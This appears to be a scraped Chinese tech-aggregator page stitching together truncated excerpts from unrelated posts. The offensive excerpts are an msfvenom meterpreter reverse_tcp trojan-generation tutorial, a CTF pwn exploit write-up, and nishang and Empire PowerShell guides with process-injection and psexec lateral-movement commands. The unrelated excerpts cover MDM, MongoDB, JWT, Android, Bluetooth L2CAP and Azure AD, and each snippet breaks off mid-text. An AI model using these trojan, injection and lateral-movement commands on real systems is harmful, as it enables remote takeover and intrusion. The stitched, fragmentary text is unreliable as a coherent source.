payload

使用kali生成远控payload

一个人想着一个人 提交于 2019-12-02 17:23:25
  kali linux中的metasploit框架是优秀的渗透框架之一,今天记载一下使用kali生成windows远控木马的过程   生成payload使用的工具是MSFVenom,我们输入msfvenom之后会显示出它的基本参数 在这里我们没有设置参数,所以第一行出现了一个错误 这里我们主要讲windows下payloads的生成和利用,在第五行里面我们看到已经给出了一个生成payload的例子,这个例子生成的就是windwos下的木马   即:  Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe  给出的例子里面没有写端口号,我们修改一点成为下面这个:  msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > ./Cl0ud.exe  LHOST就是你kali的ip地址,LPORT就是想要让kali监听用哪一个端口来监听这个shell,然后将这个生成的exe文件输出到当前目录下Cl0ud.exe  我这里kali是内网地址:10.10.10.128,监听端口是1234

iOS: config profile for mobile device management

不打扰是莪最后的温柔 提交于 2019-12-02 15:19:48
I am able to create and install(in iOS devices) general mobileconfig profile generated by iPhone configuration utility(IPCU) v3.5(289) in Mac OS 10.6.8. But when I am generating config profile for mobile device management, not able to install it in iOS devices. I want to know to set the identity which certificate should I use. I have iOS developer account and iOS Enterprise account.So I can create the required certificate. For identity section I tried using SCEP also, but no luck,so I want to use the required certificate in Credentials. If some one has any sample mdm config profile please

unctf esayrop wp

冷暖自知 提交于 2019-12-02 14:37:36
目录 题目基本信息 题目漏洞 思路 exp脚本 题目基本信息 题目漏洞 首先在main函数中需要绕过一个if判断才能进入漏洞函数 漏洞函数中很明显的栈溢出漏洞,同时还控制了返回地址不能超过文件映射到内存的最大地址 思路 所以我们的思路很明显,因为函数中控制了返回地址,所以断绝了直接返回运行shellcode的可能,所以我们先通过双leave劫持栈,再在栈上布置返回shellcode的地址即可 栈的布置有三种打法, 1、在栈上布置system函数的地址,再双leave后的ret跳到system函数执行,并在栈上的相应位置布置上bin/sh的地址。可是通过多次调试后失败了,虽然程序成功运行了system函数,但是却没有返回shell,这可能是跟环境有关。 2、在栈上布置shellcode的返回地址,并在程序合适的段中写入shellcode,可是这个文件中并没有可写并可执行的段,所以这个打不通。 3、在栈上布置one_gadget地址,通过这个成功打通。 exp脚本 想要知道one_gadget的地址,就必须泄露靶机的libc库 from pwn import * from LibcSearcher import * #context.log_level = 'debug' sh = remote('101.71.29.5',10041) elf = ELF('./a') read

PowerShell攻击:nishang

只愿长相守 提交于 2019-12-02 13:04:21
nishanhg 下载地址:https://github.com/samratashok/nishing 1.简介 nishang的使用是要在PowerShell 3.0以上的环境中才可以正常使用。也就是说win7下是有点小问题的。因为win7下自带的环境是PowerShell 2.0 2.环境准备 查看powershell版本 get-host 或者 $PSVersionTable.PSVersion Win Server 对应的 Powershell的版本如下: Windows 2008 R2 - Version 2 Windows 2012 - Version 3 Windows 2012 R2 - Version 4 Windows 2016 - Version 5 这里我们使用win 10 进行测试: 1.修改执行策略 为防止恶意脚本的运行,powershell 有一个执行策略,默认情况下该执行策略被设置为Restricted受限,而Restricted是不允许任何脚本运行的。 在powershell 脚本无法执行时,可以使用下面的cmdlet命令确定当前的执行策略。 Get-ExecutionPolicy Restricted: 脚本不能运行(默认设置) RemoteSigned: 本地创建的脚本可以运行,但从网上下载的脚本不能运行(拥有数字签名的除外)

Python爬虫学习记录——7.数据入库之MongoDB

你离开我真会死。 提交于 2019-12-02 11:37:24
文章目录 MongoDB 实战 MongoDB 什么是MongoDB MongoDB是一个高性能,开源,无模式的文档型数据库 MongoDB 将数据存储为一个文档,数据结构由键值(key=>value)对组成 MongoDB相关的安装 这里仅列出Windows系统的安装方法。 推荐博客:https://zhuanlan.zhihu.com/p/29986675,博客中给出了详细的 MongoDB 数据库、可视化工具 RoboMongo 和MongoDB的PyCharm插件—— Mongo Plugin 的安装步骤和方法,可按照步骤安装并测试连接 Python用于操作MongoDB的第三方库pymongo安装: pip install pymongo MongoDB在Python中的基本使用 这里通过一个简单的例子展示使用pymongo连接MongoDB数据库,并插入数据 #! /usr/bin/env python # -*- coding:utf-8 -*- from pymongo import MongoClient client = MongoClient ( ) db = client . test #连接test数据库,没有则自动创建 my_set = db . set #使用set集合,没有则自动创建 my_set . insert ( { 'name' :

Token的原理及实现

匆匆过客 提交于 2019-12-02 11:01:54
一. Token出现的背景 1. 在早前的Web应用中,Web 基本上就是文档的浏览而已, 既然是浏览,作为服务器, 不需要记录谁在某一段时间里都浏览了什么文档,每次请求都是一个新的HTTP协议, 就是请求加响应, 尤其是我不用记住是谁刚刚发了HTTP请求,每个请求对我来说都是全新的; 2. 但是随着交互式Web应用的兴起,像在线购物网站,需要登录的网站等等,马上就面临一个问题,那就是要管理会话,必须记住哪些人登录系统, 哪些人往自己的购物车中放商品, 也就是说我必须把每个人区分开,这就是一个不小的挑战,因为HTTP请求是无状态的,所以想出的办法就是给大家发一个会话标识(session id), 说白了就是一个随机的字串,每个人收到的都不一样, 每次大家向我发起HTTP请求的时候,把这个字符串给一并捎过来, 这样我就能区分开谁是谁了; 3. 但是客户端只需要保存自身的session id,而服务器端则要保存所有客户端的session id ,这对服务器说是一个巨大的开销 , 严重的限制了服务器扩展能力; Token的出现解决了这个问题,因为服务端 不需要存储Token的信息 ,而是通过 CPU的计算 + 数据的加密解密再核对Token的方式 来验证用户是否合法(即HTTP请求信息有没有被篡改),让服务器内存得到释放; 4. session id可以被伪造, 没有采取加密的方法!!!

Android:修改连接到AP端显示的设备名

ε祈祈猫儿з 提交于 2019-12-02 10:44:36
一、Android系统代码中实现设备名分配   1. \frameworks\base\services\core\java\com\android\server\ConnectivityService.java     建立连接时读取 "net.hostname" 属性值是否为空,如果为空则获取设备id,加上"android-"前缀并设置到属性: protected ConnectivityService(Context context, INetworkManagementService netManager, INetworkStatsService statsService, INetworkPolicyManager policyManager, IpConnectivityLog logger) { mHandlerThread = new HandlerThread("ConnectivityServiceThread"); mHandlerThread.start(); mHandler = new InternalHandler(mHandlerThread.getLooper()); mTrackerHandler = new NetworkStateTrackerHandler(mHandlerThread.getLooper()); // setup our

PowerShell渗透--Empire(三)

不问归期 提交于 2019-12-02 09:38:45
会话注入 我们可以使用usemodule management/psinject模块来进程注入,获取权限 设置下Listeners和ProcID这2个参数,这里的ProcID就是之前的CMD的pid,反弹回域用户权限shell usemodule management/psinject set Listener Micr067 set ProcID 3768 execute 3.Invoke-PsExec PsExec缺点是基本杀毒软件都能检测到,并会留下日志,而且需要开启admin$ 445端口共享。 优点是可以直接返回SYSTEM权限。 使用该模块的前提是已经获得本地管理员权限,甚至域管理员账户,然后以此来进一步持续渗透整个内网。 我们测试该模块前看下当前agents,有个机器名为WIN-PC2的服务器,如下图所示。 使用模块usemodule lateral_movement/invoke_psexec渗透域内另一台机器 这里要设置下机器名和监听,注意这里的机器名是机器的全名,命令执行完毕成功获得新的session set ComputerName WIN-DC.payload.com set Listener Micr067 execute 因为我上个session是管理员权限,使用psexec模块直接将管理员权限提升到system权限 4.Invoke-WMI

蓝牙协议栈之L2CAP(chapter 2)

被刻印的时光 ゝ 提交于 2019-12-02 08:56:42
L2CAP协议概述 L2CAP中文为逻辑链路适配层,主要提供信息数据的分割/重组等传输方式。在bluedroid中,很多的上层会向l2cap注册相关服务,比如rfcomm(虚拟串口,最多可虚拟64路),sdp,gatt等。 1、L2CA_Register (SDP_PSM, &sdp_cb.reg_info) 2、L2CA_Register (BT_PSM_ATT, (tL2CAP_APPL_INFO *) &dyn_info) l2cap的框架结构图如下、 一、通道标识符 l2cap传输是基于信道的概念进行传输,没一个信道都有各自的信道标识符(channel identify,CID),在HCI层完成相关初始化后,信道就会被创建,在ACL链路中通常需要创建一个CID为0x0001的控制信道,用于传输控制命令。 CID为2byte,具体如下图所示(通常用于ER( 常规蓝牙 )传输ACL,ASB和AMP链路) 而在 低功耗蓝牙 中,需要使用如下的CID进行表示 二、信道工作模式 逻辑信道可以工作在5种不同的模式下(可以理解为5种不同的使用场景),最后一种是LE设备特有的: 1、 Basic L2CAP Mode (equivalent to L2CAP specification in Bluetooth v1.1) 默认模式,在未选择其他模式的情况下,用此模式。 2、 Flow

Azure AD JWT token: how to see through which client secret it was granted

扶醉桌前 提交于 2019-12-02 08:09:23
问题 I have an Azure AD application and have generated two client secrets. I can get a JWT access token using each secret (via client_credentials grant) but can I also see from the JWT token via which client secret it was requested? If I inspect the JWT tokens I get back, some payload fields are always the same ( aud , iss , etc) and some are always different ( iat , nbf , aio , etc) but there is no info as far as I can tell that identifies the client secret that was used. Here's an example